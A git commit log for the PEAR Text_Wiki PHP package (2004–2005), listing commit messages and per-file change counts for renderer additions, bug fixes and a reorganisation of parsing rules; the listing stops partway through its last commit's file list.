commit 3025af1b5434546002235724ea0acf48eb3beff6
Author: Paul M Jones 
Date:   Sat Sep 25 18:53:05 2004 +0000

    added change note about Latex renderer, added Latex format class and render classes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169210 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 50 ++++++++++++++++++++++++++++++++++++++++----------
 1 file changed, 40 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/3025af1b5434546002235724ea0acf48eb3beff6

-----------------------------------------------------------------------

commit 31ce5186bfcc9f352d42dc482388e895acd0e60e
Author: Paul M Jones 
Date:   Sat Sep 25 19:05:14 2004 +0000

    converted tabs to spaces in all files
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169211 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                            | 2440 +++++++++++++++---------------
 Text/Wiki/Parse.php                      |  444 +++---
 Text/Wiki/Parse/Anchor.php               |   98 +-
 Text/Wiki/Parse/Blockquote.php           |    6 +-
 Text/Wiki/Parse/Break.php                |   70 +-
 Text/Wiki/Parse/Center.php               |   84 +-
 Text/Wiki/Parse/Code.php                 |  100 +-
 Text/Wiki/Parse/Colortext.php            |  112 +-
 Text/Wiki/Parse/Deflist.php              |  164 +-
 Text/Wiki/Parse/Delimiter.php            |   84 +-
 Text/Wiki/Parse/Embed.php                |  118 +-
 Text/Wiki/Parse/Emphasis.php             |   94 +-
 Text/Wiki/Parse/Freelink.php             |  170 +--
 Text/Wiki/Parse/Heading.php              |  136 +-
 Text/Wiki/Parse/Horiz.php                |   68 +-
 Text/Wiki/Parse/Html.php                 |   76 +-
 Text/Wiki/Parse/Image.php                |  102 +-
 Text/Wiki/Parse/Include.php              |  108 +-
 Text/Wiki/Parse/Interwiki.php            |  202 +--
 Text/Wiki/Parse/Italic.php               |   94 +-
 Text/Wiki/Parse/List.php                 |  414 ++---
 Text/Wiki/Parse/Newline.php              |   74 +-
 Text/Wiki/Parse/Paragraph.php            |  218 +--
 Text/Wiki/Parse/Phplookup.php            |   80 +-
 Text/Wiki/Parse/Prefilter.php            |   78 +-
 Text/Wiki/Parse/Raw.php                  |   72 +-
 Text/Wiki/Parse/Revise.php               |  224 +--
 Text/Wiki/Parse/Strong.php               |   92 +-
 Text/Wiki/Parse/Superscript.php          |   92 +-
 Text/Wiki/Parse/Table.php                |  374 ++---
 Text/Wiki/Parse/Tighten.php              |   30 +-
 Text/Wiki/Parse/Toc.php                  |  184 +--
 Text/Wiki/Parse/Translatehtml.php        |   30 +-
 Text/Wiki/Parse/Tt.php                   |   84 +-
 Text/Wiki/Parse/Url.php                  |  456 +++---
 Text/Wiki/Parse/Wikilink.php             |  254 ++--
 Text/Wiki/Render.php                     |  324 ++--
 Text/Wiki/Render/Latex.php               |    4 +-
 Text/Wiki/Render/Latex/Anchor.php        |   26 +-
 Text/Wiki/Render/Latex/Blockquote.php    |   16 +-
 Text/Wiki/Render/Latex/Center.php        |   18 +-
 Text/Wiki/Render/Latex/Embed.php         |    2 +-
 Text/Wiki/Render/Latex/Emphasis.php      |   14 +-
 Text/Wiki/Render/Latex/Freelink.php      |   14 +-
 Text/Wiki/Render/Latex/Image.php         |   96 +-
 Text/Wiki/Render/Latex/Include.php       |    2 +-
 Text/Wiki/Render/Latex/Interwiki.php     |   56 +-
 Text/Wiki/Render/Latex/List.php          |    6 +-
 Text/Wiki/Render/Latex/Phplookup.php     |   14 +-
 Text/Wiki/Render/Latex/Prefilter.php     |    6 +-
 Text/Wiki/Render/Latex/Table.php         |   16 +-
 Text/Wiki/Render/Latex/Tighten.php       |    2 +-
 Text/Wiki/Render/Latex/Translatehtml.php |    2 +-
 Text/Wiki/Render/Latex/Url.php           |    8 +-
 Text/Wiki/Render/Latex/Wikilink.php      |   20 +-
 Text/Wiki/Render/Plain.php               |    4 +-
 Text/Wiki/Render/Plain/Anchor.php        |   10 +-
 Text/Wiki/Render/Plain/Blockquote.php    |   30 +-
 Text/Wiki/Render/Plain/Bold.php          |    2 +-
 Text/Wiki/Render/Plain/Center.php        |    2 +-
 Text/Wiki/Render/Plain/Colortext.php     |    2 +-
 Text/Wiki/Render/Plain/Deflist.php       |    4 +-
 Text/Wiki/Render/Plain/Embed.php         |    2 +-
 Text/Wiki/Render/Plain/Emphasis.php      |    2 +-
 Text/Wiki/Render/Plain/Heading.php       |   10 +-
 Text/Wiki/Render/Plain/Image.php         |    2 +-
 Text/Wiki/Render/Plain/Include.php       |    2 +-
 Text/Wiki/Render/Plain/Interwiki.php     |    2 +-
 Text/Wiki/Render/Plain/Italic.php        |    2 +-
 Text/Wiki/Render/Plain/List.php          |   86 +-
 Text/Wiki/Render/Plain/Phplookup.php     |    2 +-
 Text/Wiki/Render/Plain/Prefilter.php     |    8 +-
 Text/Wiki/Render/Plain/Table.php         |  104 +-
 Text/Wiki/Render/Plain/Tighten.php       |    2 +-
 Text/Wiki/Render/Plain/Translatehtml.php |    2 +-
 Text/Wiki/Render/Plain/Url.php           |    2 +-
 Text/Wiki/Render/Xhtml.php               |   34 +-
 Text/Wiki/Render/Xhtml/Anchor.php        |   38 +-
 Text/Wiki/Render/Xhtml/Blockquote.php    |   42 +-
 Text/Wiki/Render/Xhtml/Bold.php          |   10 +-
 Text/Wiki/Render/Xhtml/Break.php         |    8 +-
 Text/Wiki/Render/Xhtml/Center.php        |   14 +-
 Text/Wiki/Render/Xhtml/Code.php          |   24 +-
 Text/Wiki/Render/Xhtml/Deflist.php       |   12 +-
 Text/Wiki/Render/Xhtml/Embed.php         |    2 +-
 Text/Wiki/Render/Xhtml/Emphasis.php      |   26 +-
 Text/Wiki/Render/Xhtml/Heading.php       |   20 +-
 Text/Wiki/Render/Xhtml/Horiz.php         |   10 +-
 Text/Wiki/Render/Xhtml/Image.php         |  262 ++--
 Text/Wiki/Render/Xhtml/Include.php       |    2 +-
 Text/Wiki/Render/Xhtml/Interwiki.php     |   84 +-
 Text/Wiki/Render/Xhtml/Italic.php        |   24 +-
 Text/Wiki/Render/Xhtml/List.php          |  234 +--
 Text/Wiki/Render/Xhtml/Paragraph.php     |   10 +-
 Text/Wiki/Render/Xhtml/Phplookup.php     |   62 +-
 Text/Wiki/Render/Xhtml/Prefilter.php     |    8 +-
 Text/Wiki/Render/Xhtml/Revise.php        |   12 +-
 Text/Wiki/Render/Xhtml/Strong.php        |   10 +-
 Text/Wiki/Render/Xhtml/Superscript.php   |   10 +-
 Text/Wiki/Render/Xhtml/Table.php         |  186 +--
 Text/Wiki/Render/Xhtml/Tighten.php       |    2 +-
 Text/Wiki/Render/Xhtml/Toc.php           |   94 +-
 Text/Wiki/Render/Xhtml/Translatehtml.php |    2 +-
 Text/Wiki/Render/Xhtml/Tt.php            |   10 +-
 Text/Wiki/Render/Xhtml/Url.php           |   50 +-
 Text/Wiki/Render/Xhtml/Wikilink.php      |  138 +-
 package.xml                              |  352 ++---
 107 files changed, 5124 insertions(+), 5122 deletions(-)

http://github.com/horde/horde/commit/31ce5186bfcc9f352d42dc482388e895acd0e60e

-----------------------------------------------------------------------

commit f4f321205d06f6b8cbeb334614212985720c6661
Author: Paul M Jones 
Date:   Sun Sep 26 15:12:21 2004 +0000

    added Function rule
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169265 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php |  1 +
 package.xml   | 11 +++++++++--
 2 files changed, 10 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/f4f321205d06f6b8cbeb334614212985720c6661

-----------------------------------------------------------------------

commit 4484955e3b7604e6509aee9de4e1796d9e2f90c6
Author: Paul M Jones 
Date:   Sun Sep 26 15:13:20 2004 +0000

    added Function rule for parsing and rendering
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169266 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Function.php        | 100 ++++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Latex/Function.php |  23 +++++++++
 Text/Wiki/Render/Plain/Function.php |  23 +++++++++
 Text/Wiki/Render/Xhtml/Function.php |  54 +++++++++++++++++++
 4 files changed, 200 insertions(+)
 create mode 100644 Text/Wiki/Parse/Function.php
 create mode 100644 Text/Wiki/Render/Latex/Function.php
 create mode 100644 Text/Wiki/Render/Plain/Function.php
 create mode 100755 Text/Wiki/Render/Xhtml/Function.php

http://github.com/horde/horde/commit/4484955e3b7604e6509aee9de4e1796d9e2f90c6

-----------------------------------------------------------------------

commit b624e669f35c1c5e03edbc806389f7a22f867153
Author: Paul M Jones 
Date:   Thu Sep 30 13:40:24 2004 +0000

    Wiki.php: fixed bug 2419 for getParseConf(), fixed similar bug in getFormatConf()
    package.xml: updated with new version and release date
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169638 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 6 +++---
 package.xml   | 8 +++++---
 2 files changed, 8 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/b624e669f35c1c5e03edbc806389f7a22f867153

-----------------------------------------------------------------------

commit 43cb498ef0a56b9af5801d357dcb547db86f76c6
Author: Paul M Jones 
Date:   Thu Sep 30 13:42:14 2004 +0000

    changed version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169639 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/43cb498ef0a56b9af5801d357dcb547db86f76c6

-----------------------------------------------------------------------

commit a416fcf7a6d7d3d4e978fb592754dd01510666de
Author: Paul M Jones 
Date:   Thu Sep 30 13:47:01 2004 +0000

    removed Translatehtml rules; this is XHTML-specific, and so belongs in Format/Xhtml.php, not a parse/render rule pair.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169641 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Translatehtml.php        | 47 --------------------------------
 Text/Wiki/Render/Latex/Translatehtml.php |  9 ------
 Text/Wiki/Render/Plain/Translatehtml.php |  9 ------
 Text/Wiki/Render/Xhtml/Translatehtml.php |  9 ------
 package.xml                              |  7 ++---
 5 files changed, 2 insertions(+), 79 deletions(-)
 delete mode 100755 Text/Wiki/Parse/Translatehtml.php
 delete mode 100644 Text/Wiki/Render/Latex/Translatehtml.php
 delete mode 100755 Text/Wiki/Render/Plain/Translatehtml.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Translatehtml.php

http://github.com/horde/horde/commit/a416fcf7a6d7d3d4e978fb592754dd01510666de

-----------------------------------------------------------------------

commit 4ef0ab3997e3c29b8a5c7c13261b07a96026fcc3
Author: Paul M Jones 
Date:   Fri Oct 8 16:24:34 2004 +0000

    added shortcuts for line keys ('a' for 'access', 'p' for 'param', etc)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 170076 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Function.php | 40 ++++++++++++++++++++++++----------------
 1 file changed, 24 insertions(+), 16 deletions(-)

http://github.com/horde/horde/commit/4ef0ab3997e3c29b8a5c7c13261b07a96026fcc3

-----------------------------------------------------------------------

commit 5e375f8c1fc2f70430399c647e48536591b9722b
Author: Paul M Jones 
Date:   Fri Oct 8 17:26:29 2004 +0000

    major changes to XHTML renderer for 'Function' -- has complete format control now, not just CSS
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 170077 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Function.php        | 21 ++++++---
 Text/Wiki/Render/Xhtml/Function.php | 86 +++++++++++++++++++++++++++++--------
 2 files changed, 81 insertions(+), 26 deletions(-)

http://github.com/horde/horde/commit/5e375f8c1fc2f70430399c647e48536591b9722b

-----------------------------------------------------------------------

commit cb89fea71214005244986f79288f73394ada3b70
Author: Paul M Jones 
Date:   Fri Oct 8 17:31:27 2004 +0000

    removed 'JEREMY' output in Tighten, changed not-implemented message in Function
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 170078 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Function.php | 2 +-
 Text/Wiki/Render/Latex/Tighten.php  | 1 -
 2 files changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/cb89fea71214005244986f79288f73394ada3b70

-----------------------------------------------------------------------

commit 4600dcfbe86d4a4a3d977e5ec4659fae8acedcf8
Author: Paul M Jones 
Date:   Fri Oct 8 17:37:15 2004 +0000

    added full output for plain text on the Function rule
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 170079 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Plain/Function.php | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/4600dcfbe86d4a4a3d977e5ec4659fae8acedcf8

-----------------------------------------------------------------------

commit 5dd8a92c074490018c044e271720cb8035ed6644
Author: Paul M Jones 
Date:   Fri Oct 8 17:46:47 2004 +0000

    added comments, converted tabs to 4-spaces
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 170080 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Function.php        | 210 ++++++++++++++++++------------------
 Text/Wiki/Render/Plain/Function.php |   6 +-
 Text/Wiki/Render/Xhtml/Function.php | 137 +++++++++++------------
 3 files changed, 170 insertions(+), 183 deletions(-)

http://github.com/horde/horde/commit/5dd8a92c074490018c044e271720cb8035ed6644

-----------------------------------------------------------------------

commit e70aa71110d08fe74135285dab05a1d40e6c861f
Author: Paul M Jones 
Date:   Fri Oct 8 17:50:55 2004 +0000

    added changes for new release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 170081 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 16 ++++++----------
 1 file changed, 6 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/e70aa71110d08fe74135285dab05a1d40e6c861f

-----------------------------------------------------------------------

commit b8a4873b6c46e1a1bfc76665751ea2280907ae9a
Author: Paul M Jones 
Date:   Fri Oct 8 17:51:16 2004 +0000

    changed version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 170082 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/b8a4873b6c46e1a1bfc76665751ea2280907ae9a

-----------------------------------------------------------------------

commit 263f49cb524f75f9bbc28bf9aba005e2016df348
Author: Paul M Jones 
Date:   Thu Oct 28 20:19:31 2004 +0000

    removed extra trailing single-quote, per Bob Glamm
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 171479 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/263f49cb524f75f9bbc28bf9aba005e2016df348

-----------------------------------------------------------------------

commit d1c17d76c658c2a34321266f2d27964de63dc773
Author: Paul M Jones 
Date:   Thu Oct 28 20:46:01 2004 +0000

    removed extra single-quote in Anchor, minor change Strong and Emphasis regex so they work inside Colortext properly
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 171480 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Anchor.php   | 2 +-
 Text/Wiki/Parse/Emphasis.php | 2 +-
 Text/Wiki/Parse/Strong.php   | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/d1c17d76c658c2a34321266f2d27964de63dc773

-----------------------------------------------------------------------

commit 28e2ec8a9913c8f4404fbb2e3a9de6890a696089
Author: Paul M Jones 
Date:   Wed Nov 3 15:24:00 2004 +0000

    fixed bug 2670, new links now get 'css_new' class (not 'css' normal class)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 172022 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/28e2ec8a9913c8f4404fbb2e3a9de6890a696089

-----------------------------------------------------------------------

commit d57e44b9cfb5b2a96b6cf8d57cd0bdcd23633b1b
Author: Paul M Jones 
Date:   Thu Dec 23 18:40:45 2004 +0000

    fixed bug 2916 (parser for "code" does not set all attributes)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 175504 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Code.php | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/d57e44b9cfb5b2a96b6cf8d57cd0bdcd23633b1b

-----------------------------------------------------------------------

commit c6f541465804abadc77f6cae1fb118bddd094ffe
Author: Paul M Jones 
Date:   Thu Dec 23 18:54:48 2004 +0000

    added feature 2971 (allow dot in interwiki rule) patch from Lukas Smith
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 175505 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Interwiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/c6f541465804abadc77f6cae1fb118bddd094ffe

-----------------------------------------------------------------------

commit 3c982804d8f994099f7b046c34460e3d41cb0316
Author: Paul M Jones 
Date:   Sat Jan 29 22:26:03 2005 +0000

    extended regex to allow for more page-name characters
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178507 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Interwiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/3c982804d8f994099f7b046c34460e3d41cb0316

-----------------------------------------------------------------------

commit ec61d1c91254e1e77723e1c8b690e59dcb76cebf
Author: Paul M Jones 
Date:   Sat Jan 29 22:29:07 2005 +0000

    added conf key 'exists_callback' to allow users to specify a callback function to tell whether a page exists or not.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178509 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 27 +++++++++++++++++----------
 1 file changed, 17 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/ec61d1c91254e1e77723e1c8b690e59dcb76cebf

-----------------------------------------------------------------------

commit 448ab628c7d3cb139a1c97dadc3bf168f276fc30
Author: Paul M Jones 
Date:   Sat Jan 29 22:38:07 2005 +0000

    gets a reference to the callback config instead of a copy, because the callback may be an object
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178511 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/448ab628c7d3cb139a1c97dadc3bf168f276fc30

-----------------------------------------------------------------------

commit ac16a9f0773927be02e67ce1f56d2d5c4d625b18
Author: Paul M Jones 
Date:   Sun Jan 30 19:05:15 2005 +0000

    changed line indenting
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178548 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Code.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/ac16a9f0773927be02e67ce1f56d2d5c4d625b18

-----------------------------------------------------------------------

commit b202c0975641016c96d0cae7fbc43c74332c7a08
Author: Paul M Jones 
Date:   Sun Jan 30 19:16:21 2005 +0000

    added change notes and new release date, moving to "beta"
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178549 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/b202c0975641016c96d0cae7fbc43c74332c7a08

-----------------------------------------------------------------------

commit 7db29e33c208c555c0ef90bd7228fb58b9ce51a3
Author: Paul M Jones 
Date:   Sun Jan 30 19:30:26 2005 +0000

    finalized for release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178553 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/7db29e33c208c555c0ef90bd7228fb58b9ce51a3

-----------------------------------------------------------------------

commit 11dc69090383445bc08dbe00613f3f4da782efb2
Author: Paul M Jones 
Date:   Mon Jan 31 14:31:47 2005 +0000

    fixed Bug:3336
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178587 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/11dc69090383445bc08dbe00613f3f4da782efb2

-----------------------------------------------------------------------

commit e7ded309e03e4b56df0475e9037d51eff7503a05
Author: Paul M Jones 
Date:   Mon Jan 31 15:46:52 2005 +0000

    moved all default pareing rules from Text/Wiki/Parse/ to Text/Wiki/Parse/Default/.
    this is to support alternate parsing rules as full class sets, e.g. bbcode or wikimedia.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 178598 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Anchor.php              |  67 --------
 Text/Wiki/Parse/Blockquote.php          | 163 --------------------
 Text/Wiki/Parse/Bold.php                |  61 --------
 Text/Wiki/Parse/Break.php               |  54 -------
 Text/Wiki/Parse/Center.php              |  60 --------
 Text/Wiki/Parse/Code.php                |  81 ----------
 Text/Wiki/Parse/Colortext.php           |  74 ---------
 Text/Wiki/Parse/Default/Anchor.php      |  67 ++++++++
 Text/Wiki/Parse/Default/Blockquote.php  | 163 ++++++++++++++++++++
 Text/Wiki/Parse/Default/Bold.php        |  61 ++++++++
 Text/Wiki/Parse/Default/Break.php       |  54 +++++++
 Text/Wiki/Parse/Default/Center.php      |  60 ++++++++
 Text/Wiki/Parse/Default/Code.php        |  81 ++++++++++
 Text/Wiki/Parse/Default/Colortext.php   |  74 +++++++++
 Text/Wiki/Parse/Default/Deflist.php     | 104 +++++++++++++
 Text/Wiki/Parse/Default/Delimiter.php   |  62 ++++++++
 Text/Wiki/Parse/Default/Embed.php       |  88 +++++++++++
 Text/Wiki/Parse/Default/Emphasis.php    |  67 ++++++++
 Text/Wiki/Parse/Default/Freelink.php    | 111 +++++++++++++
 Text/Wiki/Parse/Default/Function.php    | 115 ++++++++++++++
 Text/Wiki/Parse/Default/Heading.php     |  89 +++++++++++
 Text/Wiki/Parse/Default/Horiz.php       |  52 +++++++
 Text/Wiki/Parse/Default/Html.php        |  57 +++++++
 Text/Wiki/Parse/Default/Image.php       |  76 +++++++++
 Text/Wiki/Parse/Default/Include.php     |  84 ++++++++++
 Text/Wiki/Parse/Default/Interwiki.php   | 120 +++++++++++++++
 Text/Wiki/Parse/Default/Italic.php      |  67 ++++++++
 Text/Wiki/Parse/Default/List.php        | 230 +++++++++++++++++++++++++++
 Text/Wiki/Parse/Default/Newline.php     |  57 +++++++
 Text/Wiki/Parse/Default/Paragraph.php   | 128 +++++++++++++++
 Text/Wiki/Parse/Default/Phplookup.php   |  58 +++++++
 Text/Wiki/Parse/Default/Prefilter.php   |  62 ++++++++
 Text/Wiki/Parse/Default/Raw.php         |  55 +++++++
 Text/Wiki/Parse/Default/Revise.php      | 130 ++++++++++++++++
 Text/Wiki/Parse/Default/Strong.php      |  67 ++++++++
 Text/Wiki/Parse/Default/Superscript.php |  67 ++++++++
 Text/Wiki/Parse/Default/Table.php       | 208 +++++++++++++++++++++++++
 Text/Wiki/Parse/Default/Tighten.php     |  32 ++++
 Text/Wiki/Parse/Default/Toc.php         | 112 ++++++++++++++
 Text/Wiki/Parse/Default/Tt.php          |  69 +++++++++
 Text/Wiki/Parse/Default/Url.php         | 265 ++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Default/Wikilink.php    | 158 +++++++++++++++++++
 Text/Wiki/Parse/Deflist.php             | 104 -------------
 Text/Wiki/Parse/Delimiter.php           |  62 --------
 Text/Wiki/Parse/Embed.php               |  88 -----------
 Text/Wiki/Parse/Emphasis.php            |  67 --------
 Text/Wiki/Parse/Freelink.php            | 111 -------------
 Text/Wiki/Parse/Function.php            | 115 --------------
 Text/Wiki/Parse/Heading.php             |  89 -----------
 Text/Wiki/Parse/Horiz.php               |  52 -------
 Text/Wiki/Parse/Html.php                |  57 -------
 Text/Wiki/Parse/Image.php               |  76 ---------
 Text/Wiki/Parse/Include.php             |  84 ----------
 Text/Wiki/Parse/Interwiki.php           | 120 ---------------
 Text/Wiki/Parse/Italic.php              |  67 --------
 Text/Wiki/Parse/List.php                | 230 ---------------------------
 Text/Wiki/Parse/Newline.php             |  57 -------
 Text/Wiki/Parse/Paragraph.php           | 128 ---------------
 Text/Wiki/Parse/Phplookup.php           |  58 -------
 Text/Wiki/Parse/Prefilter.php           |  62 --------
 Text/Wiki/Parse/Raw.php                 |  55 -------
 Text/Wiki/Parse/Revise.php              | 130 ----------------
 Text/Wiki/Parse/Strong.php              |  67 --------
 Text/Wiki/Parse/Superscript.php         |  67 --------
 Text/Wiki/Parse/Table.php               | 208 -------------------------
 Text/Wiki/Parse/Tighten.php             |  32 ----
 Text/Wiki/Parse/Toc.php                 | 112 --------------
 Text/Wiki/Parse/Tt.php                  |  69 ---------
 Text/Wiki/Parse/Url.php                 | 265 --------------------------------
 Text/Wiki/Parse/Wikilink.php            | 158 -------------------
 70 files changed, 3350 insertions(+), 3350 deletions(-)
 delete mode 100644 Text/Wiki/Parse/Anchor.php
 delete mode 100755 Text/Wiki/Parse/Blockquote.php
 delete mode 100755 Text/Wiki/Parse/Bold.php
 delete mode 100755 Text/Wiki/Parse/Break.php
 delete mode 100755 Text/Wiki/Parse/Center.php
 delete mode 100755 Text/Wiki/Parse/Code.php
 delete mode 100755 Text/Wiki/Parse/Colortext.php
 create mode 100644 Text/Wiki/Parse/Default/Anchor.php
 create mode 100755 Text/Wiki/Parse/Default/Blockquote.php
 create mode 100755 Text/Wiki/Parse/Default/Bold.php
 create mode 100755 Text/Wiki/Parse/Default/Break.php
 create mode 100755 Text/Wiki/Parse/Default/Center.php
 create mode 100755 Text/Wiki/Parse/Default/Code.php
 create mode 100755 Text/Wiki/Parse/Default/Colortext.php
 create mode 100755 Text/Wiki/Parse/Default/Deflist.php
 create mode 100755 Text/Wiki/Parse/Default/Delimiter.php
 create mode 100755 Text/Wiki/Parse/Default/Embed.php
 create mode 100755 Text/Wiki/Parse/Default/Emphasis.php
 create mode 100755 Text/Wiki/Parse/Default/Freelink.php
 create mode 100644 Text/Wiki/Parse/Default/Function.php
 create mode 100755 Text/Wiki/Parse/Default/Heading.php
 create mode 100755 Text/Wiki/Parse/Default/Horiz.php
 create mode 100755 Text/Wiki/Parse/Default/Html.php
 create mode 100755 Text/Wiki/Parse/Default/Image.php
 create mode 100755 Text/Wiki/Parse/Default/Include.php
 create mode 100755 Text/Wiki/Parse/Default/Interwiki.php
 create mode 100755 Text/Wiki/Parse/Default/Italic.php
 create mode 100755 Text/Wiki/Parse/Default/List.php
 create mode 100755 Text/Wiki/Parse/Default/Newline.php
 create mode 100755 Text/Wiki/Parse/Default/Paragraph.php
 create mode 100755 Text/Wiki/Parse/Default/Phplookup.php
 create mode 100755 Text/Wiki/Parse/Default/Prefilter.php
 create mode 100755 Text/Wiki/Parse/Default/Raw.php
 create mode 100755 Text/Wiki/Parse/Default/Revise.php
 create mode 100755 Text/Wiki/Parse/Default/Strong.php
 create mode 100755 Text/Wiki/Parse/Default/Superscript.php
 create mode 100755 Text/Wiki/Parse/Default/Table.php
 create mode 100755 Text/Wiki/Parse/Default/Tighten.php
 create mode 100755 Text/Wiki/Parse/Default/Toc.php
 create mode 100755 Text/Wiki/Parse/Default/Tt.php
 create mode 100755 Text/Wiki/Parse/Default/Url.php
 create mode 100755 Text/Wiki/Parse/Default/Wikilink.php
 delete mode 100755 Text/Wiki/Parse/Deflist.php
 delete mode 100755 Text/Wiki/Parse/Delimiter.php
 delete mode 100755 Text/Wiki/Parse/Embed.php
 delete mode 100755 Text/Wiki/Parse/Emphasis.php
 delete mode 100755 Text/Wiki/Parse/Freelink.php
 delete mode 100644 Text/Wiki/Parse/Function.php
 delete mode 100755 Text/Wiki/Parse/Heading.php
 delete mode 100755 Text/Wiki/Parse/Horiz.php
 delete mode 100755 Text/Wiki/Parse/Html.php
 delete mode 100755 Text/Wiki/Parse/Image.php
 delete mode 100755 Text/Wiki/Parse/Include.php
 delete mode 100755 Text/Wiki/Parse/Interwiki.php
 delete mode 100755 Text/Wiki/Parse/Italic.php
 delete mode 100755 Text/Wiki/Parse/List.php
 delete mode 100755 Text/Wiki/Parse/Newline.php
 delete mode 100755 Text/Wiki/Parse/Paragraph.php
 delete mode 100755 Text/Wiki/Parse/Phplookup.php
 delete mode 100755 Text/Wiki/Parse/Prefilter.php
 delete mode 100755 Text/Wiki/Parse/Raw.php
 delete mode 100755 Text/Wiki/Parse/Revise.php
 delete mode 100755 Text/Wiki/Parse/Strong.php
 delete mode 100755 Text/Wiki/Parse/Superscript.php
 delete mode 100755 Text/Wiki/Parse/Table.php
